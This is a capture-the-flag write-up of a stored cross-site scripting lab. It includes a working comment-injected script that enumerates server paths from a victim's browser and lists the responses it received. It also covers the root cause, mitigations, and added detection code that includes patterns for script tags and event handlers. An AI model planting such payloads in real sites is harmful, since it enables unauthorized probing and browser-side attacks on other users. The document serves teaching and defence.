Stored XSS – Internal Endpoint Enumeration Through Comment Injection | Crate & Sleeve
Lab Link
Lab: Crate & Sleeve
Overview
The Crate & Sleeve challenge appears to demonstrate a Stored Cross-Site Scripting (Stored XSS) vulnerability within community comment functionality.
The application allowed users to submit content that was later rendered in the browser without proper sanitization.
Because JavaScript execution became possible, browser-side actions could be performed automatically against application endpoints.
Instead of immediately targeting cookie theft or account takeover, JavaScript was used for endpoint discovery and application mapping.
Objective
Abuse comment functionality to execute JavaScript and enumerate internal application resources.
Vulnerability Classification Hierarchy
OWASP Category
└── A05: Injection
    └── Cross-Site Scripting (XSS)
        └── Stored XSS
            └── Unsanitized User Input Rendered in Comments
Reconnaissance
The challenge description highlighted:
The comment thread is where regulars haggle over pressing variants and condition grades
Comment systems are common attack surfaces because they frequently render user-controlled content.
Testing indicated JavaScript execution was possible.
Payload used:
<script>
// candidate resources to probe from inside the victim's browser
const paths = [
  '/admin.php',
  '/moderator.php',
  '/dashboard.php',
  '/comments.php',
  '/comment.php',
  '/profile.php',
  '/users.php',
  '/flag',
  '/flag.php',
  '/flag.txt',
  '/robots.txt'
];
document.body.innerHTML = "<h2>Results</h2>";
// request each path and append its HTTP status to the page
paths.forEach(p => {
  fetch(p)
    .then(r => document.body.innerHTML += `<div>${p} : ${r.status}</div>`)
    .catch(() => {});
});
</script>
Analysis
The script attempted to:
- Request multiple application endpoints
- Capture HTTP response codes
- Display discovered results inside the page
This effectively created a lightweight browser-side directory enumeration mechanism.
Application responses:
/robots.txt : 200
/flag.php : 404
/moderator.php : 404
/flag.txt : 404
/admin.php : 404
/profile.php : 404
/dashboard.php : 404
Server information:
Apache/2.4.67 (Debian)
The successful response from /robots.txt suggested further information disclosure opportunities.
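The enumeration loop above leaves a distinctive trace on the server: one client issues a burst of requests within a second or two, most of them answered 404, each carrying the page that hosts the comment as its Referer. The following is an added example, not part of the original write-up, that looks for that burst in Apache "combined" access-log lines. Every log line in it is constructed for the demo; the host lab.example and the /comments.php referer are assumptions, not values from the lab.

```javascript
// Added example (not from the write-up): detect a browser-side enumeration
// burst in Apache combined-format access logs. Log lines are constructed;
// lab.example and the /comments.php referer are assumed, not taken from the lab.

const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Mar/2025:14:02:01 +0000] "GET /comments.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:02 +0000] "GET /admin.php HTTP/1.1" 404 196 "http://lab.example/comments.php" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:02 +0000] "GET /moderator.php HTTP/1.1" 404 196 "http://lab.example/comments.php" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:02 +0000] "GET /dashboard.php HTTP/1.1" 404 196 "http://lab.example/comments.php" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:03 +0000] "GET /flag.php HTTP/1.1" 404 196 "http://lab.example/comments.php" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:03 +0000] "GET /flag.txt HTTP/1.1" 404 196 "http://lab.example/comments.php" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:03 +0000] "GET /profile.php HTTP/1.1" 404 196 "http://lab.example/comments.php" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Mar/2025:14:02:04 +0000] "GET /robots.txt HTTP/1.1" 200 77 "http://lab.example/comments.php" "Mozilla/5.0"',
  '198.51.100.4 - - [10/Mar/2025:14:05:10 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [10/Mar/2025:14:05:41 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "http://lab.example/index.php" "Mozilla/5.0"',
];

// Apache combined format: client ident user [time] "method path proto" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;
const MONTHS = { Jan: '01', Feb: '02', Mar: '03', Apr: '04', May: '05', Jun: '06',
                 Jul: '07', Aug: '08', Sep: '09', Oct: '10', Nov: '11', Dec: '12' };

// "10/Mar/2025:14:02:02 +0000" -> epoch milliseconds (NaN if malformed)
function parseApacheTime(stamp) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}:\d{2}:\d{2}) ([+-]\d{2})(\d{2})$/.exec(stamp);
  if (!m || !MONTHS[m[2]]) return NaN;
  return Date.parse(`${m[3]}-${MONTHS[m[2]]}-${m[1]}T${m[4]}${m[5]}:${m[6]}`);
}

// One log line -> structured entry, or null when the line does not parse
function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { client: m[1], time: parseApacheTime(m[2]), method: m[3], path: m[4],
           status: Number(m[5]), referer: m[6], ua: m[7] };
}

// Flag any client with >= minNotFound 404 responses inside a sliding window
// of windowMs; report the probed paths and the referers that drove them.
function detectEnumeration(lines, { windowMs = 10000, minNotFound = 5 } = {}) {
  const byClient = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e) continue;
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push(e);
  }
  const findings = [];
  for (const [client, entries] of byClient) {
    const misses = entries.filter(e => e.status === 404).sort((a, b) => a.time - b.time);
    let best = 0, start = 0;
    for (let end = 0; end < misses.length; end++) {
      while (misses[end].time - misses[start].time > windowMs) start++;
      best = Math.max(best, end - start + 1);
    }
    if (best >= minNotFound) {
      findings.push({
        client,
        notFoundInWindow: best,
        paths: [...new Set(misses.map(e => e.path))],
        referers: [...new Set(misses.map(e => e.referer))],
      });
    }
  }
  return findings;
}

console.log(JSON.stringify(detectEnumeration(SAMPLE_LOG), null, 2));
```

The referer set is the useful pivot for response: when every 404 in the burst points back at the same comment page, that page is where the stored payload lives and the comment table is where to look for it.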
Proof of Exploitation
Confirmed capabilities:
Comment Input
    ↓
Stored JavaScript
    ↓
Victim Browser Execution
    ↓
Internal Endpoint Enumeration
This verified successful JavaScript execution within the application context.
Root Cause
The application likely rendered comments similar to:
echo $_POST['comment'];
instead of safely encoding output:
echo htmlspecialchars($_POST['comment']);
As a result:
<script>
...
</script>
was interpreted as executable code rather than plain text.
Impact
Stored XSS can lead to:
- Session theft
- Account takeover
- Administrative compromise
- CSRF abuse
- Internal endpoint discovery
- Credential theft
- Sensitive information disclosure
Stored XSS often becomes more severe than reflected XSS because payloads execute automatically for other users.
Mitigation
Encode output before rendering
Bad:
echo $comment;
Secure:
echo htmlspecialchars($comment);
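To make the difference between the two render paths concrete, here is an added example, not from the write-up or the lab, that rewrites the comment render step from the Root Cause section in JavaScript so it runs stand-alone. encodeHtml() mirrors PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'): the five characters that can end a text node or an attribute value become entities and nothing else is touched. One caveat worth knowing: on PHP versions before 8.1 the default flags of htmlspecialchars() did not encode the single quote, which matters if the encoded value ever lands inside a single-quoted attribute; the entQuotes=false switch reproduces that older behaviour so the gap is visible. The STORED_COMMENT constant is a trimmed form of the payload above and is the only input the demo uses.

```javascript
// Added example (not from the write-up): vulnerable vs. hardened comment
// rendering, with an encoder equivalent to htmlspecialchars(ENT_QUOTES).

const ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

// Encode the characters that are significant in HTML text and attribute
// context. entQuotes=false mimics pre-8.1 PHP defaults, which left ' alone.
function encodeHtml(text, { entQuotes = true } = {}) {
  const pattern = entQuotes ? /[&<>"']/g : /[&<>"]/g;
  return String(text).replace(pattern, ch => ENTITY_MAP[ch]);
}

// What `echo $_POST['comment'];` amounts to: the stored body is spliced
// straight into markup, so a <script> in it is parsed as a script element.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// What `echo htmlspecialchars($_POST['comment']);` amounts to: encode at the
// point where untrusted text meets HTML, not when the comment is stored.
function renderCommentSafe(comment) {
  return `<div class="comment">${encodeHtml(comment)}</div>`;
}

// Demo-only check: does the rendered markup still contain a script start
// tag or an inline event handler? (A real test would parse it with a DOM.)
function containsActiveMarkup(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

// Trimmed form of the write-up's enumeration comment, used as untrusted input.
const STORED_COMMENT = "<script>const paths=['/admin.php','/robots.txt'];paths.forEach(p=>fetch(p));</script>";

console.log('unsafe :', renderCommentUnsafe(STORED_COMMENT));
console.log('safe   :', renderCommentSafe(STORED_COMMENT));
```

The safe render keeps every character of the comment, including the angle brackets, as visible text; only the interpretation changes, which is why output encoding rather than stripping is the right primary control here.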
Apply Content Security Policy
Example:
Content-Security-Policy: default-src 'self'
Validate and sanitize user input
Restrict:
<script>
onerror=
onload=
javascript:
Avoid rendering raw HTML
User content should generally be treated as text.
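The two supporting controls in this section, the CSP header and the "Restrict" list, are easy to get subtly wrong, so here is an added example, not from the write-up, that makes both checkable. inlineScriptAllowed() evaluates a Content-Security-Policy header value the way a browser does for an inline <script> block: script-src falls back to default-src when absent, and 'unsafe-inline' is ignored once a nonce or hash source is also listed. screenComment() flags comment text matching the four patterns the page lists; it is meant as a detection and triage signal on stored content, not as the primary defence, because a pattern list cannot cover every way of expressing script in HTML and output encoding already handles those cases. The sample comments are constructed.

```javascript
// Added example (not from the write-up): evaluate a CSP header for inline
// script, and screen stored comment text against the page's "Restrict" list.

// "default-src 'self'; script-src 'self' 'nonce-x'" -> Map(directive -> sources)
function parseCsp(header) {
  const policy = new Map();
  for (const part of String(header).split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// true when an inline <script> block would execute under this policy
function inlineScriptAllowed(header) {
  if (!header) return true;                       // no policy, nothing blocks inline script
  const policy = parseCsp(header);
  const sources = policy.get('script-src') ?? policy.get('default-src');
  if (sources === undefined) return true;         // neither directive present
  const lower = sources.map(s => s.toLowerCase());
  // CSP2+: a nonce or hash in the list makes 'unsafe-inline' a no-op
  const hasNonceOrHash = lower.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return lower.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// The write-up's Restrict list, as named detection rules
const RESTRICT_RULES = [
  { name: 'script-tag',      re: /<\s*script\b/i },
  { name: 'onerror-handler', re: /\bonerror\s*=/i },
  { name: 'onload-handler',  re: /\bonload\s*=/i },
  { name: 'javascript-uri',  re: /javascript\s*:/i },
];

// Names of the rules a comment body triggers (empty array = nothing flagged)
function screenComment(text) {
  return RESTRICT_RULES.filter(r => r.re.test(String(text))).map(r => r.name);
}

// Constructed sample data for the demo
const POLICIES = [
  "default-src 'self'",                                   // the page's example: inline script blocked
  "default-src 'self'; script-src 'self' 'unsafe-inline'", // common weakening: inline script allowed
  "script-src 'nonce-abc123' 'unsafe-inline'",            // nonce present, 'unsafe-inline' ignored
];
const COMMENTS = [
  'Nice pressing, VG+ sleeve, would buy again',
  '<script>fetch("/robots.txt")</script>',
];

for (const p of POLICIES) console.log(`${p}  =>  inline script allowed: ${inlineScriptAllowed(p)}`);
for (const c of COMMENTS) console.log(`${JSON.stringify(c)}  =>  flagged: ${JSON.stringify(screenComment(c))}`);
```

Reading the CSP result alongside the encoding fix: `default-src 'self'` alone blocks the inline payload from this lab even when encoding is missed, but it is a backstop, and it also blocks the site's own inline scripts unless they are moved to files or given nonces.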
Real-World Insight
Stored XSS commonly appears in:
- Comments
- Forums
- Chat systems
- Support tickets
- User profiles
- Review platforms
A common assumption is:
Only trusted users can post here
Attackers routinely abuse trusted content areas because users and administrators often interact with them automatically.
Remaining Step
The final exploitation path and flag retrieval step were not included in the captured notes and should be added once completed.
